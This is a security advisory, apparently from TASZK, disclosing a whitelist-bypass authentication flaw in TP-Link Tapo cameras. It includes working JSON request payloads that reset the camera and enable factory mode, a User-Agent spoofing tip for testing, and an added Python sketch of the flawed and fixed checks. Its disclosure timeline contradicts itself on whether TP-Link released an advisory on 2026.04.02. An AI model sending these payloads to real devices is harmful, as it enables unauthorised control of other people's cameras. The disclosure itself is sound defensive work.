An attacker sending a malformed HTTP POST request over LAN to a TP-Link Smart camera device can trigger the vulnerability described here.
This report describes an authentication bypass vulnerability in the HTTP server implementation.
The vulnerability we are disclosing in this advisory affected a wide range of TP-Link devices, including TAPO Smart Cameras. A TP-Link Security Advisory was promised for release in April 2026 after several delays, but this did not happen, and the vendor provided no explanation.
Vulnerability Details
The TAPO architecture can authenticate different account roles, one of which is the hub user. A whitelist introduced in recent builds (2025) limits this role to a few less sensitive actions.
This limit can be bypassed due to a vulnerability.
The hub user is only allowed to execute Style-III requests, and the code handling them attempts to block execution of most requests.
However, the following request contains two action_names:
// Style III
{
  "method": "multipleRequest",
  "params": {
    "requests": [{
      "method": "action_name1", // *
      "params": {
        "module_name": {
          "action_name": ...
        }
      }
    }]
  }
}
*: Method is converted using a mapping defined by /etc/dsd_convert.json. Working examples include syncHubReset and setTimezone.
In practice, the first name (action_name1) is only used to determine the method, while the nested action_name determines the actual action.
However, the whitelist is compared only against action_name1.
Thus, the whitelist can be bypassed if we provide syncHubReset for do method actions, or setTimezone for set method actions.
The following examples provide a quick view:
{
  "method": "multipleRequest",
  "params": {
    "requests": [{
      // A DO action...
      "method": "syncHubReset",
      "params": {
        // ... to reset the camera
        "system": {
          "soft_reset": ...
        }
      }
    }]
  }
}

{
  "method": "multipleRequest",
  "params": {
    "requests": [{
      // a SET action...
      "method": "setTimezone",
      "params": {
        // ... to set the factory mode
        "tp_manage": {
          "factory_mode": {"enabled": "1"}
        }
      }
    }]
  }
}
Note: in order to test this vulnerability without a Tapo Hub device, force the User-Agent with the curl setting -H 'User-Agent: Hub' during login (authentication).
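The whitelist flaw described above, reduced to its logic and shown beside a stricter check, as an added example that is not TP-Link's firmware code or part of the original advisory. The CONVERT table is a constructed stand-in for /etc/dsd_convert.json, whose contents the advisory does not show; its module and action targets, the function names and the sample timezone value are assumptions.

```python
# Constructed stand-in for /etc/dsd_convert.json: the advisory does not show
# the file, so the (verb, module, action) targets below are assumptions.
CONVERT = {
    "syncHubReset": ("do", "hub_manage", "sync_reset"),  # hypothetical target
    "setTimezone": ("set", "system", "basic"),           # hypothetical target
}
HUB_WHITELIST = {"syncHubReset", "setTimezone"}


def flawed_check(req):
    """Check described in the advisory: only the outer method name is compared."""
    method = req.get("method")
    return isinstance(method, str) and method in HUB_WHITELIST


def strict_check(req):
    """Allow a request only if the inner module/action it would execute is
    exactly the one the whitelisted outer method name maps to."""
    method = req.get("method")
    if not isinstance(method, str):
        return False
    if method not in HUB_WHITELIST or method not in CONVERT:
        return False
    _verb, module, action = CONVERT[method]
    params = req.get("params")
    if not isinstance(params, dict) or set(params) != {module}:
        return False
    actions = params[module]
    return isinstance(actions, dict) and set(actions) == {action}


def filter_hub_requests(body, check):
    """Apply `check` to every sub-request of a Style-III multipleRequest body."""
    requests = body.get("params", {}).get("requests", [])
    return [(r.get("method"), check(r)) for r in requests if isinstance(r, dict)]


# Constructed sample body: the first entry is the factory-mode request from
# the advisory, the second a well-formed setTimezone call (values assumed).
SAMPLE = {"method": "multipleRequest", "params": {"requests": [
    {"method": "setTimezone",
     "params": {"tp_manage": {"factory_mode": {"enabled": "1"}}}},
    {"method": "setTimezone",
     "params": {"system": {"basic": {"timezone": "UTC+01:00"}}}},
]}}

if __name__ == "__main__":
    print("flawed:", filter_hub_requests(SAMPLE, flawed_check))
    print("strict:", filter_hub_requests(SAMPLE, strict_check))
```

The strict variant binds the authorization decision to the module and action that will actually run, so a whitelisted outer name cannot carry a different inner action.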
Affected Devices
- verified: TAPO C520WS
- potentially: TP-Link smart devices using the TAPO architecture
Timeline
- 2025.12.12. Vulnerability reported to TP-Link PSIRT by email.
- 2026.02.04. TP-Link acknowledges the report.
- 2026.03.04. TP-Link confirms vulnerability and asks for time extension. TP-Link also provides erroneous analysis for several other reported vulnerabilities.
- 2026.03.04. TASZK provides update explaining the errors in TP-Link’s assessment regarding other reported vulnerabilities, describing which CVE assignment and advisory detail assessments are incorrect.
- 2026.03.05. TP-Link again asks for a 3 week extension and does not confirm any TASZK analysis.
- 2026.03.06. TASZK confirms that a 3 week extension will be granted for vulnerabilities where a CVE assignment and/or Advisory correction will happen.
- 2026.03.20. TP-Link communicates that this vulnerability (along with some reported at the time) has been fixed and wishes TASZK to provide a black box analysis of a new firmware image. TP-Link does not confirm which submitted vulnerabilities will receive a CVE and/or Advisory correction but asks for another arbitrary extension for only 1 vulnerability.
- 2026.03.23. TASZK confirms that the 3 week extension will be granted if the list of vulnerabilities that are receiving a CVE and/or Advisory correction is shared, otherwise no other extension will be granted.
- 2026.03.26-04.01. TP-Link attempts to get in touch via several non-official channels, including an attempt to show up at our offices in person uninvited. With no coherent explanation, TP-Link requests an embargo extension of 3 weeks for this vulnerability, promising advisory release for April 20th.
- 2026.04.02. End date of original 90 day + 3 week embargo. TASZK highlights that the PSIRT keeps sending plaintext emails with sensitive vulnerability information, points out that non-PSIRT channels are considered out-of-bounds for coordinated disclosure and confirms that embargo windows will not be extended further. TASZK volunteers a 24h notice to TP-Link for advisory release.
- 2026.04.02. TP-Link releases advisory for the vulnerability: https://www.tp-link.com/us/support/faq/5047/
- 2026.04.06. TASZK communicates notice of release to TP-Link.
- 2026.04.20-28. The promised TP-Link advisory release does not happen.
- 2026.04.28. Advisory released.